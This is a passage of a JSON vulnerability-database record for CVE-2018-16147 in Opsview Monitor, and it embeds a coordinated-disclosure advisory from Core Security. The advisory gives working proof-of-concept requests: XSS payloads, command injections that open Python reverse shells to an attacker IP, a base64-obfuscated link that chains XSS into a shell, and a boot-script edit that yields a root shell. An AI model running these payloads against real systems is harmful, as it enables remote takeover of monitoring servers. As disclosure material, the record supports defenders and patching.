{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-17454",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-16147",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-16147",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-17454",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-156",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-16147",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. OpsviewMonitor is a virtual appliance designed to be deployed in an organization\u0027s network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a cross-site scripting vulnerability that allows an attacker to exploit malicious JavaScript code in the context of a legitimate user. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nOpsview Monitor Multiple Vulnerabilities\n\n1. **Advisory Information**\n\nTitle: Opsview Monitor Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0008\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities\nDate published: 2018-09-04\nDate of last update: 2018-09-04\nVendors contacted: Opsview\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Special Elements used in an OS\nCommand [CWE-78], Improper Neutralization of Special Elements used in\nan OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,\nCVE-2018-16145\n\n3. **Vulnerability Description**\n\nOpsview\u0027s website states that:\n\nOpsview[1] builds monitoring software that helps DevOps understand how\nthe performance of their hybrid IT infrastructure \u0026 apps impacts\nbusiness service delivery. Opsview Monitor supports +3500 Nagios plugins\nand service checks making it easy to monitor everything from Docker and\nVMware to Amazon Web Services, Hyper-V and more. \n\n4. **Vulnerable Packages**\n\n . Opsview Monitor 5.4\n . 
Opsview Monitor 5.3\n . Opsview Monitor 5.2\n\nOther products and versions might be affected, but they were not tested. \n\n5. **Vendor Information, Solutions and Workarounds**\n\nOpsview released the following versions of its product that fix the\nreported issues. Opsview Monitor 6.0\n . Opsview Monitor 5.4.2\n . Opsview Monitor 5.3.1\n\nIn addition, Opsview published the following release notes:\n\n . https://knowledge.opsview.com/v5.4/docs/whats-new\n . https://knowledge.opsview.com/v5.3/docs/whats-new\n\n6. **Credits**\n\nThese vulnerabilities were discovered and researched by Fernando Diaz\nand Fernando Catoira from Core Security Consulting Services. The\npublication of this advisory was coordinated by Leandro Cuozzo from Core\nAdvisories Team. \n \n7. \nMultiple vulnerabilities were found in the context of this appliance,\nwhich could allow a remote attacker to compromise the system. \nIn addition, issues presented in 7.3 and 7.4 could allow an attacker to\nobtain command execution on the system as the nagios user. Finally, the\nissue found in one of the scripts run during the boot process presented\nin 7.5 would allow attackers to elevate their privileges from nagios\nuser to root after a system restart, hence obtaining full control of the\nappliance. \n\n7.1. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;\nauth_tkt=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%3D%3D\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n-----/\n\n7.2. 
The following proof of\nconcept demonstrates the vulnerability:\n \n/-----\nPOST /settings/api/router?_dc=1521575692128 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: rifle\nx-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 506\nCookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;\nauth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D\nConnection: close\n\n[{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":2},{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"profile\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":3}]\n-----/\n\nThe input will be stored without any sanitization and rendered every\ntime the /settings section is visited by the user. It\u0027s important to\npoint that this XSS is self stored and it\u0027s executed only in the context\nof the victim\u0027s session. 
\nExcerpt of the source code showing the injected script tag:\n\n/-----\n[{\"property\":\"name\",\"root\":\"data\",\"direction\":\"ASC\"}]}},\"contact\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"name\",\"root\":\"data\"}]}},\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"pageSize\":50,\"filters\":[],\"page\":1}},\"hostcheckcommand\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"priority\",\"root\":\"data\"}]}},\"netflow_collector\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"page\":1,\"filters\":[],\"pageSize\":50}},\"\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"\n-----/\n\n7.3. **Notification abuse leading to remote command execution**\n\n[CVE-2018-16146] Opsview Web Management console provides a functionality\naccessible by an authenticated administrator to test notifications that\nare triggered under certain configurable events. The \u0027value\u0027 parameter\nis not properly sanitized, leading to an arbitrary command injection\nexecuted on the system with nagios\u0027 user privileges. 
\n \nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/notificationmethod/testnotification?_dc=1520444703477\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)\nGecko/20100101 Firefox/58.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 376\nCookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;\nopsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;\nauth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: close\n\n{\"message\":\"Test\nMessage\",\"command\":\"submit_xmpp_script\",\"variables\":[],\"test_variables\":[{\"name\":\"PAGER\",\"value\":\"123123123\n|| python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\u003cattackerIP\u003e\\\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);\u0027\"}],\"id\":\"20\"}\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ 
id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nAdditionally, it is possible to combine this issue with a redirection\nfunctionality within the management console and the vulnerability\ndescribed in 7.1 (Reflected Cross-Site Scripting), to build a specially\ncrafted link that could be sent to an administrator to trigger a reverse\nshell. \n\nIn order to perform the attack, consider the following:\n\n. API\u0027s sensitive actions require a \u0027restToken\u0027 to be processed. Abuse the login page redirection functionality to force the user to\naccess the Cross-Site Scripting vulnerable URL described in 7.1 (you may\nalso abuse the Cross-Site scripting vulnerability reported in\nhttps://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). \nIf the user is already authenticated he will be automatically redirected. \nOtherwise, the login page will appear and the redirection will take\nplace after a successful login. \n\nThe following proof of concept presents a crafted link that could\ntrigger a reverse shell if accessed by an administrator:\n\n/-----\nhttps://\u003cserverIP\u003e/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%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%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1\n-----/\n\nOnce 
clicked, the authenticated administrator will be redirected to the\nvulnerable section where his browser will perform a request to the\n\u0027/settings\u0027 endpoint in order to obtain a valid \u0027restToken\u0027. Finally,\nusing that token, the API request to\n\u0027rest/config/notificationmethod/testnotification\u0027 will be exploited thus\nresulting in a reverse shell. \n\n7.4. **Rancid test connection functionality abuse leading to command\nexecution**\n\n[CVE-2018-16144] NetAudit is a section within Network Analyzer that\nallows the user to automate the backing up of network devices\u0027\nconfiguration files to a centralized location. The test connection\nfunctionality is vulnerable to command injection due to an improper\nsanitization of the \u0027rancid_password\u0027 parameter. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: b3d716e0157fd6337e6978220188051d8c578850\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 434\nCookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;\nauth_tkt=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%3D%3D\nConnection: 
close\n\nip=\u003cattackerIP\u003e++++++\u0026rancid_vendor=1\u0026rancid_username=234234+add+password+xxxxx\u0026rancid_connection_type=telnet\u0026rancid_autoenable=1\u0026rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+\u0027import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"\u003cattackerIP\u003e\",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\u0027`\u0026host_id=2\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n$ uname -a\nLinux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34\nUTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n-----/\n\n7.5. **Script modification could allow local privilege escalation**\n\n[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios\nprivileges and the scripts that run at boot time, impersonate nagios\nuser during its execution. However, the\n\u0027/etc/init.d/opsview-reporting-module\u0027 script invokes the\n\u0027/opt/opsview/jasper/bin/db_jasper\u0027 script before dropping root\nprivileges. \n \nThe following excerpt shows the vulnerable code:\n \n/-----\n/etc/init.d/opsview-reporting-module:\n\n/opt/opsview/jasper/bin/db_jasper db_exists 2\u003e /dev/null\nif [ $? != 0 ]; then\n echo \"Attempted to start jasperserver but MySQL credentials are wrong.\"\n exit 0\nfi\n\nDAEMON=/opt/opsview/jasper/bin/rc.jasperserver\n\ntest -x $DAEMON || exit 0\n\n# Switch to opsview user if run as root\nid | grep \"uid=0(\" \u003e/dev/null\nif [ $? 
= 0 ] ; then\n su - opsview -c \"$DAEMON $@\"\nelse\n exec $DAEMON $@\nfi\n-----/\n\nThe file \u0027/opt/opsview/jasper/bin/db_jasper\u0027, which is invoked by the\nvulnerable script, can be edited by the nagios user which belongs to the\n\u0027opsview\u0027 group. \n \n/-----\nls -ltr /opt/opsview/jasper/bin/db_jasper\n-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017\n/opt/opsview/jasper/bin/db_jasper\nnagios@image-builder-299:/home/admin$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nSince \u0027db_jasper\u0027 receives \u0027db_exists\u0027 as an argument, which is later\nused in a case statement, an attacker could edit that specific part of\nthe script in order to execute arbitrary code once the appliance is\nrebooted. \n\nThe following excerpt shows the attacker\u0027s bash script which, after\nexecution, will trigger a reverse shell with root privileges:\n\n/-----\nwhile [ \"x$1\" != \"x\" ] ; do\n case \"$1\" in\n db_export)\n db_export\n ;;\n db_export_test)\n db_export_test\n ;;\n db_export_initial)\n TEST=1\n db_backup\n ;;\n db_import)\n db_import\n ;;\n db_install)\n db_install\n ;;\n db_backup)\n db_backup\n ;;\n db_restore)\n db_restore\n ;;\n db_exists)\n python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattackerIP\u003e\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\u0027 \u0026\n db_exists\n exit $?\n ;;\n db_upgrade)\n db_upgrade\n exit $?\n ;;\n *)\n die \"Usage: $0\n{db_export|db_import|db_install|db_backup|db_restore}\"\n ;;\n\n esac\n shift\ndone\n-----/\n\n/-----\n$nc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 45566)\n# id\nuid=0(root) gid=0(root) groups=0(root)\n-----/\n\n8. 
**Report Timeline**\n\n2018-05-03: Core Security sent an initial notification to Opsview,\nasking for GPG keys in order to send draft advisory. \n2018-05-04: Opsview replied attaching its GPG keys. \n2018-05-04: Core Security sent the encrypted draft advisory. \n2018-05-04: Opsview confirmed the reception of the advisory and informed\nan initial response would be ready by May 11th. \n2018-05-11: Opsview replied saying they were able to reproduce all of\nthe reported vulnerabilities and confirmed that they were present in all\nsupported versions of Opsview Monitor (5.4, 5.3 and 5.2). \nIn addition, Opsview informed that were planning to release a fix for\nthese versions by the end of July. \n2018-05-11: Core Security thanked the confirmation. \n2018-06-25: Opsview informed that they were planning to release a major\nupdate for the product (6.0) at the end of July. This update will\naddress all reported vulnerabilities. Also, they informed that the\nprevious versions of the product would be fixed by the end of August. \n2018-06-27: Core Security thanked the status update and asked for a\ntentative public disclosure date. \n2018-07-16: Core Security requested a status update. \n2018-07-18: Opsview proposed to set a tentative publication date by the\nend of August when they release the fixes for its earlier versions. \n2018-07-18: Core Security agreed with the Opsview\u0027s proposal. \n2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0\nrelease will be available on July 25th. In addition, they\ninformed that they didn\u0027t have the exact release date for the updates to\nprevious versions of the product. \n2018-08-06: Core Security requested a status update for the remaining\nfixes. \n2018-08-13: Opsview replied saying that they were targeting the week of\nAugust 24th for release the fixes of their earlier product versions and\nthey would confirm the exact date at the end of the next week. \n2018-08-13: Core Security thanked the reply. 
\n2018-08-24: Opsview informed Core Security that the remaining fixed\nversions will be available on August 29th. \n2018-08-24: Core Security thanked the update and proposed September 4th\nas the coordinated release date. \n2018-08-28: Opsview agreed on the proposed release date. \n2018-09-04: Advisory CORE-2018-0008 published. \n\n9. **References**\n\n[1] https://www.opsview.com/solutions\n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. \n\n11. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. 
**Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-16147",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-17454",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-16147",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149236",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"id": "VAR-201809-0905",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
}
]
},
"last_update_date": "2023-12-18T12:01:17.606000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "5.3.1 - Security Update",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"title": "5.4.2 Released: 04th September 2018",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"title": "Patch for OpsviewMonitor Cross-Site Scripting Vulnerability (CNVD-2018-17454)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/139515"
},
{
"title": "Opsview Monitor Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84508"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://seclists.org/fulldisclosure/2018/sep/3"
},
{
"trust": 1.8,
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16147"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16147"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/settings/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16148"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16144"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16146"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://www.cvedetails.com/cve/cve-2016-2511/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16145"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/login?back=%2frest%2fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmfyihhocia9ig5ldybytuxidhrwumvxdwvzdcgpo3hoci5vbnjlywr5c3rhdgvjagfuz2ugpsbmdw5jdglvbigpihtpziaoeghylnjlywr5u3rhdgugpt0gwe1mshr0cfjlcxvlc3qure9orsl7cmvnzxhwid0glyg%2fonjlc3rub2tlbii6iikolio%2fksg%2foiiplzt0b2tlbia9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3jlz2v4cca9ic8opzp1c2vytmftzsi6iikolio%2fksg%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%2bxcismtywmdapkttvcy5kdxaykhmuzmlszw5vkcksmck7ig9zlmr1cdiocy5mawxlbm8okswxktsgb3muzhvwmihzlmzpbgvubygpldipo3a9c3vichjvy2vzcy5jywxskftcii9iaw4vc2hciixcii1pxcjdktsnin1dlcjpzci6ijeiftt4ahiylnnlbmqoslnpti5zdhjpbmdpznkoym9keskpo2fszxj0khrva2vuktthbgvydch1c2vybmftzsk7fx07eghylm9wzw4oj1bpu1qnlcanl3nldhrpbmdzlycsihrydwupo3hoci5zzw5kkg51bgwpow%3d%3d%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://www.opsview.com/solutions"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "CNNVD",
